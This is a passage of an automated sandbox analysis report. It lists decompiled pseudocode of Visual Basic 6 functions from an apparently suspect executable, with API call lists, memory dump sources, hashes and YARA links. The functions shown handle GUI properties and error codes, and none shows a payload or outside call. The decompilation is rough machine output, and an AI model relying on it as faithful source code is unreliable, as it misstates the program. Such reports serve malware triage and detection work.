				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr* _t25;
				void* _t27;
				void* _t30;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr* _t47;
				void* _t48;
				void* _t50;
				intOrPtr _t51;
				intOrPtr _t52;

				_t51 = _t50 - 0xc;
				 *[fs:0x0] = _t51;
				_t52 = _t51 - 0x28;
				_v16 = _t52;
				_v12 = 0x401340;
				_v8 = 0;
				_t47 = _a4;
				 *((intOrPtr*)( *_t47 + 4))(_t47, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t48);
				_v28 = 0;
				_v32 = 0;
				__imp____vbaStrCopy();
				_t25 =  *((intOrPtr*)( *_t47 + 0x3b0))(_t47);
				__imp____vbaObjSet( &_v32, _t25);
				_t44 = _t25;
				_t27 =  *((intOrPtr*)( *_t44 + 0x23c))(_t44, _v28);
				asm("fclex");
				if(_t27 < 0) {
					__imp____vbaHresultCheckObj(_t27, _t44, 0x410414, 0x23c);
				}
				__imp____vbaFreeObj();
				_t45 = _t52 - 0x10;
				 *_t45 = 8;
				 *((intOrPtr*)(_t45 + 4)) = _v44;
				 *(_t45 + 8) = L"ToolTipText";
				 *((intOrPtr*)(_t45 + 0xc)) = _v36;
				_t30 =  *((intOrPtr*)( *_t47 + 0x390))(_t47);
				asm("fclex");
				if(_t30 < 0) {
					__imp____vbaHresultCheckObj(_t30, _t47, 0x40f430, 0x390);
				}
				__imp____vbaFreeStr(0x415d59);
				return _t30;
			}




















                                                                                0x00415c73
                                                                                0x00415c82
                                                                                0x00415c89
                                                                                0x00415c8f
                                                                                0x00415c92
                                                                                0x00415c9b
                                                                                0x00415c9e
                                                                                0x00415ca4
                                                                                0x00415cad
                                                                                0x00415cb0
                                                                                0x00415cb3
                                                                                0x00415cbc
                                                                                0x00415cc7
                                                                                0x00415cd0
                                                                                0x00415cd6
                                                                                0x00415cde
                                                                                0x00415ce0
                                                                                0x00415cee
                                                                                0x00415cee
                                                                                0x00415cf7
                                                                                0x00415d05
                                                                                0x00415d0f
                                                                                0x00415d14
                                                                                0x00415d17
                                                                                0x00415d1d
                                                                                0x00415d20
                                                                                0x00415d28
                                                                                0x00415d2a
                                                                                0x00415d38
                                                                                0x00415d38
                                                                                0x00415d52
                                                                                0x00415d58

                                                                                APIs
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415CB3
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415CC7
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000023C), ref: 00415CEE
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415CF7
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401340,0040F430,00000390), ref: 00415D38
                                                                                • __vbaFreeStr.MSVBVM60(00415D59,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415D52
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$Copy
                                                                                • String ID: ToolTipText
                                                                                • API String ID: 2714663509-1021058858
                                                                                • Opcode ID: 1f255d4b518208c9a6b42715e43c61880ae14d4f20628a28c6d47aff8d44e0f5
                                                                                • Instruction ID: 33de4cc99446451a3635e04d7da42baef83112a3494888afb963685ac4157390
                                                                                • Opcode Fuzzy Hash: 1f255d4b518208c9a6b42715e43c61880ae14d4f20628a28c6d47aff8d44e0f5
                                                                                • Instruction Fuzzy Hash: 2C216D70900209EFCB049F99CA89AEEBBB8FF58700F208529F505E32A0D7786945CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041CCA0, Relevance: 12.1, APIs: 8, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 23%
                                                                                			E0041CCA0(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v48;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				char _v80;
				short _v84;
				short _t46;
				void* _t47;
				intOrPtr* _t49;
				char* _t53;
				void* _t54;
				intOrPtr* _t70;
				signed int _t73;
				intOrPtr* _t74;
				signed int _t76;
				signed int _t77;
				void* _t78;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t82;

				_t81 = _t80 - 0xc;
				 *[fs:0x0] = _t81;
				_t82 = _t81 - 0x48;
				_v16 = _t82;
				_v12 = 0x4016f0;
				_t76 = _a4;
				_v8 = _t76 & 0x00000001;
				_t77 = _t76 & 0xfffffffe;
				_a4 = _t77;
				 *((intOrPtr*)( *_t77 + 4))(_t77, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t78);
				_t7 = _t77 + 0x34; // 0x401724
				_t56 = _t7;
				_t73 = 0;
				_v28 = 0;
				_v32 = 0;
				_v48 = 0;
				_v64 = 0;
				_v80 = 0;
				E0041DA00(_t7, 0, _t77,  &_v48, _t7);
				_t46 =  &_v48;
				_v72 = 0;
				_v80 = 0x800b;
				__imp____vbaVarTstEq( &_v80, _t46);
				_v84 = _t46;
				__imp____vbaFreeVar();
				if(_v84 != 0) {
					_t49 =  &_v32;
					__imp____vbaObjSet(_t49,  *((intOrPtr*)( *_t77 + 0x30c))(_t77));
					_t74 = _t49;
					_v72 = 0x80020004;
					_v80 = 0xa;
					E0041D830(_t56, _t74, _t77,  &_v48, _t56);
					_t70 = _t82 - 0x10;
					 *_t70 = _v80;
					 *((intOrPtr*)(_t70 + 4)) = _v76;
					 *((intOrPtr*)(_t70 + 8)) = _v72;
					_t53 =  &_v28;
					 *((intOrPtr*)(_t70 + 0xc)) = _v68;
					__imp____vbaStrVarVal(_t53,  &_v48);
					_t54 =  *((intOrPtr*)( *_t74 + 0x1ec))(_t74, _t53);
					asm("fclex");
					if(_t54 < 0) {
						__imp____vbaHresultCheckObj(_t54, _t74, 0x4110d8, 0x1ec);
					}
					__imp____vbaFreeStr();
					__imp____vbaFreeObj();
					__imp____vbaFreeVar();
					_t73 = 0;
				}
				_t47 =  *((intOrPtr*)( *_t77 + 0x6fc))(_t77);
				_v8 = _t73;
				_push(0x41cdfe);
				return _t47;
			}





























                                                                                0x0041cca3
                                                                                0x0041ccb2
                                                                                0x0041ccb9
                                                                                0x0041ccbf
                                                                                0x0041ccc2
                                                                                0x0041ccc9
                                                                                0x0041ccd1
                                                                                0x0041ccd4
                                                                                0x0041ccd8
                                                                                0x0041ccdd
                                                                                0x0041cce0
                                                                                0x0041cce0
                                                                                0x0041cce6
                                                                                0x0041ccea
                                                                                0x0041cced
                                                                                0x0041ccf0
                                                                                0x0041ccf3
                                                                                0x0041ccf6
                                                                                0x0041ccf9
                                                                                0x0041ccfe
                                                                                0x0041cd06
                                                                                0x0041cd09
                                                                                0x0041cd10
                                                                                0x0041cd19
                                                                                0x0041cd1d
                                                                                0x0041cd27
                                                                                0x0041cd37
                                                                                0x0041cd3b
                                                                                0x0041cd46
                                                                                0x0041cd48
                                                                                0x0041cd4f
                                                                                0x0041cd56
                                                                                0x0041cd66
                                                                                0x0041cd68
                                                                                0x0041cd6d
                                                                                0x0041cd73
                                                                                0x0041cd76
                                                                                0x0041cd79
                                                                                0x0041cd81
                                                                                0x0041cd89
                                                                                0x0041cd91
                                                                                0x0041cd93
                                                                                0x0041cda1
                                                                                0x0041cda1
                                                                                0x0041cdaa
                                                                                0x0041cdb3
                                                                                0x0041cdbc
                                                                                0x0041cdc2
                                                                                0x0041cdc2
                                                                                0x0041cdc7
                                                                                0x0041cdcd
                                                                                0x0041cdd0
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0041DA00: __vbaNew2.MSVBVM60(0040B730,?,00000000,004016F0,00401724), ref: 0041DA46
                                                                                  • Part of subcall function 0041DA00: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DA67
                                                                                  • Part of subcall function 0041DA00: __vbaVarTextTstEq.MSVBVM60(?,?), ref: 0041DA78
                                                                                  • Part of subcall function 0041DA00: __vbaFreeVar.MSVBVM60 ref: 0041DA83
                                                                                  • Part of subcall function 0041DA00: __vbaVarMove.MSVBVM60 ref: 0041DAA5
                                                                                • __vbaVarTstEq.MSVBVM60(?,?,?,00401724), ref: 0041CD10
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041CD1D
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041CD3B
                                                                                  • Part of subcall function 0041D830: __vbaNew2.MSVBVM60(0040B730,?,0041A58C,0040160E,00000000), ref: 0041D873
                                                                                  • Part of subcall function 0041D830: __vbaHresultCheckObj.MSVBVM60(00000000,0040160E,00411158,00000028), ref: 0041D894
                                                                                  • Part of subcall function 0041D830: __vbaVarMove.MSVBVM60 ref: 0041D8A0
                                                                                  • Part of subcall function 0041D830: __vbaNew2.MSVBVM60(0040B730,?), ref: 0041D8B0
                                                                                  • Part of subcall function 0041D830: __vbaHresultCheckObj.MSVBVM60(00000000,0040160E,00411158,00000024), ref: 0041D8D1
                                                                                  • Part of subcall function 0041D830: __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041D8DC
                                                                                  • Part of subcall function 0041D830: __vbaFreeObj.MSVBVM60 ref: 0041D8E5
                                                                                • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041CD81
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000001EC), ref: 0041CDA1
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0041CDAA
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041CDB3
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041CDBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$CheckHresult$New2$Move$AddrefText
                                                                                • String ID:
                                                                                • API String ID: 1958995884-0
                                                                                • Opcode ID: 7beee8e3230af983d5d0d36260d709c3d97969727100c4d91b5e4ffed9991194
                                                                                • Instruction ID: 216af6537d7fe68e7bcb3f168ccfc5d9b30925e2f8a028a7b625b906e42be39d
                                                                                • Opcode Fuzzy Hash: 7beee8e3230af983d5d0d36260d709c3d97969727100c4d91b5e4ffed9991194
                                                                                • Instruction Fuzzy Hash: 36410BB1D00249EFCB00DFA9D9889EEFBB8FF48704F10812AE455A7250DB746946CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00416AA0, Relevance: 12.1, APIs: 8, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 20%
                                                                                			E00416AA0(short* _a8) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				short _v40;
				short _v48;
				short _v52;
				void* _t34;
				void* _t44;
				void* _t46;
				intOrPtr _t48;

				 *[fs:0x0] = _t48;
				L00401D20();
				_v28 = _t48;
				_v24 = 0x401378;
				_v20 = 0;
				_v16 = 0;
				_v8 = 1;
				_v8 = 2;
				__imp____vbaOnError(0xffffffff, _t44, _t46, _t34,  *[fs:0x0], 0x401d26);
				_v8 = 3;
				E0040F6F8();
				_v52 = 0x24;
				__imp____vbaSetSystemError(0x10);
				if(_v52 < 0) {
					_v8 = 4;
					__imp____vbaI2I4();
					_v40 = 0x24;
				}
				_v8 = 6;
				E0040F6F8();
				_v52 = 0x24;
				__imp____vbaSetSystemError(0x11);
				if(_v52 < 0) {
					_v8 = 7;
					__imp____vbaI2I4();
					_v40 = 0x24;
				}
				_v8 = 9;
				E0040F6F8();
				_v52 = 0x24;
				__imp____vbaSetSystemError(0x12);
				if(_v52 < 0) {
					_v8 = 0xa;
					__imp____vbaI2I4();
					_v40 = 0x24;
				}
				_v8 = 0xc;
				_v48 = _v40;
				 *_a8 = _v48;
				 *[fs:0x0] = _v36;
				return 0;
			}
















                                                                                0x00416ab2
                                                                                0x00416abe
                                                                                0x00416ac6
                                                                                0x00416ac9
                                                                                0x00416ad0
                                                                                0x00416ad7
                                                                                0x00416ade
                                                                                0x00416ae5
                                                                                0x00416aee
                                                                                0x00416af4
                                                                                0x00416afd
                                                                                0x00416b02
                                                                                0x00416b06
                                                                                0x00416b11
                                                                                0x00416b13
                                                                                0x00416b1f
                                                                                0x00416b25
                                                                                0x00416b25
                                                                                0x00416b29
                                                                                0x00416b32
                                                                                0x00416b37
                                                                                0x00416b3b
                                                                                0x00416b46
                                                                                0x00416b48
                                                                                0x00416b56
                                                                                0x00416b5c
                                                                                0x00416b5c
                                                                                0x00416b60
                                                                                0x00416b69
                                                                                0x00416b6e
                                                                                0x00416b72
                                                                                0x00416b7d
                                                                                0x00416b7f
                                                                                0x00416b8d
                                                                                0x00416b93
                                                                                0x00416b93
                                                                                0x00416b97
                                                                                0x00416ba2
                                                                                0x00416bad
                                                                                0x00416bb5
                                                                                0x00416bc2

                                                                                APIs
                                                                                • __vbaChkstk.MSVBVM60(?,00401D26), ref: 00416ABE
                                                                                • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401D26), ref: 00416AEE
                                                                                • __vbaSetSystemError.MSVBVM60(00000010,?,?,?,?,00401D26), ref: 00416B06
                                                                                • __vbaI2I4.MSVBVM60 ref: 00416B1F
                                                                                • __vbaSetSystemError.MSVBVM60(00000011), ref: 00416B3B
                                                                                • __vbaI2I4.MSVBVM60 ref: 00416B56
                                                                                • __vbaSetSystemError.MSVBVM60(00000012), ref: 00416B72
                                                                                • __vbaI2I4.MSVBVM60 ref: 00416B8D
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Error$System$Chkstk
                                                                                • String ID:
                                                                                • API String ID: 1207130036-0
                                                                                • Opcode ID: ea9604c5916d525a8328da06356a28026cd912875048fd067f192b200c4bdb86
                                                                                • Instruction ID: 327cac6cddf6cd9854ff14e78122b0fc01e26885dc900f474e498e473df09a84
                                                                                • Opcode Fuzzy Hash: ea9604c5916d525a8328da06356a28026cd912875048fd067f192b200c4bdb86
                                                                                • Instruction Fuzzy Hash: EC312B74811258EAEB10EFE5DA097DDB7F0FF08708F10816EE901B76A0D7B91A84DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00421270, Relevance: 12.0, APIs: 8, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaCastObj.MSVBVM60(00000000,00411580,?,?,?,?,?,00401D26), ref: 004212B3
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,00401D26), ref: 004212C4
                                                                                • __vbaObjSetAddref.MSVBVM60(004019A4,00000000,?,?,?,?,?,00401D26), ref: 004212CE
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00401D26), ref: 004212D3
                                                                                • __vbaNew.MSVBVM60(00411590,?,?,?,?,?,00401D26), ref: 004212DE
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,00401D26), ref: 004212E9
                                                                                • __vbaObjSetAddref.MSVBVM60(004019A4,00000000,?,?,?,?,?,00401D26), ref: 004212ED
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00401D26), ref: 004212F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$AddrefFree$Cast
                                                                                • String ID:
                                                                                • API String ID: 1392565369-0
                                                                                • Opcode ID: 5351791343b62573ab7622ea7e42c0724a9c9e6e1ce10e945ae8ba8bc7e4ee02
                                                                                • Instruction ID: 6aa348e2409fc626726c32a0e11aaafdac8e423d8c066127c6e7128b407930ed
                                                                                • Opcode Fuzzy Hash: 5351791343b62573ab7622ea7e42c0724a9c9e6e1ce10e945ae8ba8bc7e4ee02
                                                                                • Instruction Fuzzy Hash: 7F0140B6900249BFD700AFA5DD46EEFBBBCEF58740F10442AFA01A3570D6745941CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041CE20, Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 27%
                                                                                			E0041CE20(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				signed int _v64;
				intOrPtr _v84;
				void* _t37;
				intOrPtr* _t39;
				char* _t45;
				void* _t46;
				signed int _t48;
				intOrPtr* _t52;
				intOrPtr* _t62;
				signed int _t64;
				signed int _t65;
				void* _t66;
				void* _t68;
				intOrPtr _t69;
				intOrPtr _t70;

				_t69 = _t68 - 0xc;
				 *[fs:0x0] = _t69;
				_t70 = _t69 - 0x3c;
				_v16 = _t70;
				_v12 = 0x401700;
				_t64 = _a4;
				_v8 = _t64 & 0x00000001;
				_t65 = _t64 & 0xfffffffe;
				_a4 = _t65;
				 *((intOrPtr*)( *_t65 + 4))(_t65, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t66);
				_t7 = _t65 + 0x38; // 0x401738
				_t48 = 0;
				_v28 = 0;
				_v32 = 0;
				_v48 = 0;
				_v64 = 0;
				if(E0041E380(0, __edi, _t65, _t7) == 0) {
					_t39 =  &_v32;
					__imp____vbaObjSet(_t39,  *((intOrPtr*)( *_t65 + 0x308))(_t65));
					_t62 = _t39;
					_t14 = _t65 + 0x38; // 0x401738
					E0041E040(0x80020004, _t62, _t65,  &_v48, _t14);
					_t52 = _t70 - 0x10;
					_v84 =  *_t62;
					 *_t52 = 0xa;
					 *((intOrPtr*)(_t52 + 4)) = _v60;
					 *((intOrPtr*)(_t52 + 8)) = 0x80020004;
					 *((intOrPtr*)(_t52 + 0xc)) = _v52;
					_t45 =  &_v28;
					__imp____vbaStrVarVal(_t45,  &_v48);
					_t46 =  *((intOrPtr*)(_v84 + 0x1ec))(_t62, _t45);
					_t48 = 0;
					asm("fclex");
					if(_t46 < 0) {
						__imp____vbaHresultCheckObj(_t46, _t62, 0x4110d8, 0x1ec);
					}
					__imp____vbaFreeStr();
					__imp____vbaFreeObj();
					__imp____vbaFreeVar();
				}
				_t37 =  *((intOrPtr*)( *_t65 + 0x6f8))(_t65);
				if(_t37 < _t48) {
					__imp____vbaHresultCheckObj(_t37, _t65, 0x410b74, 0x6f8);
				}
				_v8 = _t48;
				_push(0x41cf5c);
				return _t37;
			}


























                                                                                0x0041ce23
                                                                                0x0041ce32
                                                                                0x0041ce39
                                                                                0x0041ce3f
                                                                                0x0041ce42
                                                                                0x0041ce49
                                                                                0x0041ce51
                                                                                0x0041ce54
                                                                                0x0041ce58
                                                                                0x0041ce5d
                                                                                0x0041ce60
                                                                                0x0041ce63
                                                                                0x0041ce66
                                                                                0x0041ce69
                                                                                0x0041ce6c
                                                                                0x0041ce6f
                                                                                0x0041ce7a
                                                                                0x0041ce8a
                                                                                0x0041ce8e
                                                                                0x0041ce94
                                                                                0x0041ce96
                                                                                0x0041cea3
                                                                                0x0041ceb0
                                                                                0x0041ceb4
                                                                                0x0041ceb7
                                                                                0x0041cebc
                                                                                0x0041cec2
                                                                                0x0041cec5
                                                                                0x0041cecb
                                                                                0x0041ced0
                                                                                0x0041cedb
                                                                                0x0041cee1
                                                                                0x0041cee5
                                                                                0x0041cee7
                                                                                0x0041cef5
                                                                                0x0041cef5
                                                                                0x0041cefe
                                                                                0x0041cf07
                                                                                0x0041cf10
                                                                                0x0041cf10
                                                                                0x0041cf19
                                                                                0x0041cf21
                                                                                0x0041cf2f
                                                                                0x0041cf2f
                                                                                0x0041cf35
                                                                                0x0041cf38
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0041E380: __vbaNew2.MSVBVM60(0040B730,?,?,00401700,00000000), ref: 0041E3C3
                                                                                  • Part of subcall function 0041E380: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028,?,00401700,00000000), ref: 0041E3E4
                                                                                  • Part of subcall function 0041E380: __vbaVarTextTstEq.MSVBVM60(?,?,?,00401700,00000000), ref: 0041E3F5
                                                                                  • Part of subcall function 0041E380: __vbaFreeVar.MSVBVM60(?,00401700,00000000), ref: 0041E400
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041CE8E
                                                                                  • Part of subcall function 0041E040: __vbaNew2.MSVBVM60(0040B730,?,00000000,00401700,80020004), ref: 0041E083
                                                                                  • Part of subcall function 0041E040: __vbaHresultCheckObj.MSVBVM60(00000000,00401700,00411158,00000028,?,?,?,?,?,?,?,?,?,?,?,00401738), ref: 0041E0A4
                                                                                  • Part of subcall function 0041E040: __vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0B0
                                                                                  • Part of subcall function 0041E040: __vbaNew2.MSVBVM60(0040B730,?,?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0C0
                                                                                  • Part of subcall function 0041E040: __vbaHresultCheckObj.MSVBVM60(00000000,00401700,00411158,00000024,?,?,?,?,?,?,?,?,?,?,?,00401738), ref: 0041E0E1
                                                                                  • Part of subcall function 0041E040: __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0EC
                                                                                  • Part of subcall function 0041E040: __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0F5
                                                                                • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041CED0
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000001EC), ref: 0041CEF5
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0041CEFE
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041CF07
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041CF10
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401700,00410B74,000006F8), ref: 0041CF2F
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$New2$AddrefMoveText
                                                                                • String ID:
                                                                                • API String ID: 1535432862-0
                                                                                • Opcode ID: 39dbd0a0bc643378dd1014624c1853a9ac8910d729adec2d9477d7c4a1e1546b
                                                                                • Instruction ID: abe30a7120a3155b0d7a314066ee02b126323e20a8f2c762e416aabec9f06969
                                                                                • Opcode Fuzzy Hash: 39dbd0a0bc643378dd1014624c1853a9ac8910d729adec2d9477d7c4a1e1546b
                                                                                • Instruction Fuzzy Hash: 4631507494024AAFCB00DFA5C9899DEBBB8FF08704F10852EF546E7691D7389986CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004182A0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 24%
                                                                                			E004182A0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				char _v48;
				void* _t29;
				intOrPtr* _t30;
				void* _t31;
				signed int _t34;
				void* _t37;
				intOrPtr* _t41;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr* _t58;
				void* _t59;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t63;

				_t62 = _t61 - 0xc;
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x30;
				_v16 = _t63;
				_v12 = 0x401508;
				_v8 = 0;
				_t58 = _a4;
				 *((intOrPtr*)( *_t58 + 4))(_t58, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t59);
				_v28 = 0;
				_v48 = 0;
				_t29 =  *((intOrPtr*)( *_t58 + 0x2b0))(_t58,  &_v28);
				asm("fclex");
				if(_t29 >= 0) {
					_t41 = __imp____vbaHresultCheckObj;
				} else {
					_t41 = __imp____vbaHresultCheckObj;
					 *_t41(_t29, _t58, 0x40f430, 0x2b0);
				}
				_t30 = _v28;
				_t54 = _t30;
				_t31 =  *((intOrPtr*)( *_t30 + 0x3c))(_t30,  &_v48);
				asm("fclex");
				if(_t31 < 0) {
					 *_t41(_t31, _t54, 0x410678, 0x3c);
				}
				_t34 =  ~(0 | _v48 == 0x00000000);
				__imp____vbaFreeObj();
				if(_t34 != 0) {
					_t34 =  *((intOrPtr*)( *_t58 + 0x8a4))(_t58);
				}
				__imp____vbaI2I4();
				_t56 = _t63 - 0x10;
				 *(_t58 + 0x50) = _t34;
				 *_t56 = 8;
				 *((intOrPtr*)(_t56 + 4)) = _v40;
				 *(_t56 + 8) = L"ScrollBars";
				 *((intOrPtr*)(_t56 + 0xc)) = _v32;
				_t37 =  *((intOrPtr*)( *_t58 + 0x390))(_t58);
				asm("fclex");
				if(_t37 < 0) {
					_t37 =  *_t41(_t37, _t58, 0x40f430, 0x390);
				}
				_push(0x4183ac);
				return _t37;
			}























                                                                                0x004182a3
                                                                                0x004182b2
                                                                                0x004182b9
                                                                                0x004182bf
                                                                                0x004182c2
                                                                                0x004182cb
                                                                                0x004182ce
                                                                                0x004182d4
                                                                                0x004182de
                                                                                0x004182e1
                                                                                0x004182e4
                                                                                0x004182ec
                                                                                0x004182ee
                                                                                0x00418306
                                                                                0x004182f0
                                                                                0x004182f0
                                                                                0x00418302
                                                                                0x00418302
                                                                                0x0041830c
                                                                                0x00418316
                                                                                0x00418318
                                                                                0x0041831d
                                                                                0x0041831f
                                                                                0x0041832a
                                                                                0x0041832a
                                                                                0x00418338
                                                                                0x0041833c
                                                                                0x00418345
                                                                                0x0041834a
                                                                                0x0041834a
                                                                                0x00418353
                                                                                0x00418361
                                                                                0x00418365
                                                                                0x0041836e
                                                                                0x00418374
                                                                                0x00418377
                                                                                0x0041837d
                                                                                0x00418380
                                                                                0x00418388
                                                                                0x0041838a
                                                                                0x00418398
                                                                                0x00418398
                                                                                0x0041839a
                                                                                0x00000000

                                                                                APIs
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401508,0040F430,000002B0), ref: 00418302
